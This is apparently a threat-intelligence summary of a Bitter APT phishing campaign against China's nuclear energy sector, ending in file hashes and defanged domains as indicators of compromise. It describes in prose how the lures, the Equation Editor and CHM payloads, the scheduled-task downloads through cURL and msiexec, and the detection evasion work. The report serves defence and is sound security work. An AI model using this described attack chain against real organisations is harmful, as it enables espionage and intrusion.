Bitter APT Group Targets China’s Nuclear Energy Industry
Intezer have been monitoring activity aimed against the energy industry and have seen a campaign using methods similar to Bitter APT. Organizations continue to be targeted by the bitter APT's espionage effort.
The emails use a variety of social engineering strategies and Phishing emails are sent using names and email addresses that appear to be from an "Embassy in Beijing." Domain reputation checks are useless because a free email provider is being used.
The name and contact information of a real attaché from the Kyrgyz embassy in China appear at the end of the email. The recipient would quickly be able to locate corroborating information if they used a search engine to look up this employee. Emails that also refer to nuclear energy target individuals and organizations in academia.
Malicious Payloads
The bait in the phishing emails asks the recipients to attend seminars on topics that interest them. The lures are made to persuade the receiver to download and open a RAR file that is attached and includes either an Excel payload or a Microsoft Compiled HTML Help (CHM) payload.
It has been seen that numerous payloads are being delivered. Equation Editor exploits in CHM files or Microsoft Excel files. These payloads are packed inside of RAR files, preventing static analysis methods that do not first decompress the files from being used.
The Equation Editor exploit that generates two distinct scheduled tasks is all that is included in the Excel payloads. Every 15 minutes, one scheduled job downloads a next-stage EXE payload using cURL and sends the actor the name of the compromised machine.
In addition to not requiring a susceptible version of Microsoft Office to be installed like Excel files, CHM payloads also use LZX compression, which allows them to evade static malware detection tools that do not decompress the file. These features make CHM payloads advantageous for the actor.
To run a remote MSI payload from the C2 using the living off the land binary msiexec, the first iteration of the CHM file will establish a scheduled job. To separate the string for obfuscation, utilize string concatenation. Moreover, the C2 receives the username and computer name.
Indicators of Compromise
File Hashes (SHA256)
- 5f663f15701f429f17cc309d10ca03ee00fd20f733220cc9d2502eff5d0cd1a1
- eb7aebded5549f8b006e19052e0d03dc9095c75a800897ff14ef872f18c8650e
- cac239cf09a6a5bc1f9a3b29141336773c957d570212b97f73e13122fe032179
- 8d2f6b0d7a6a06708593cc64d9187878ea9d2cc3ae9a657926aa2a8522b93f74
- 33905e2db3775d2e8e75c61e678d193ac2bab5b5a89d798effbceb9ab202d799
- 5c85194ade91736a12b1eeeb13baa0b0da88c5085ca0530c4f1d86342170b3bc
- Ef4fb1dc3d1ca5ea8a88cd94596722b93524f928d87dff0d451d44da4e9181f1
- b2566755235c1df3371a7650d94339e839efaa85279656aa9ab4dc4f2d94bbfa
- 33a20950e7f4b2191706ddf9089f1e91be1e5384cca00a57cf6b58056f70c96b
- 7e7e90b076ef3ea4ef8ed4ef14fb599a2acb15d9ce00c78e5949186da1e355cf
- 07504fcef717e6b74ed381e94eab5a9140171572b5572cda87b275e3873c8a88
- 06b4c1f46845cee123b2200324a3ebb7fdbea8e2c6ef4135e3f943bd546a2431
- ded0635c5ef9c3d63543abc36a69b1176875dba84ca005999986bd655da3a446
Domains
- qwavemediaservice[.]net
- mirzadihatti[.]com
- coauthcn[.]com
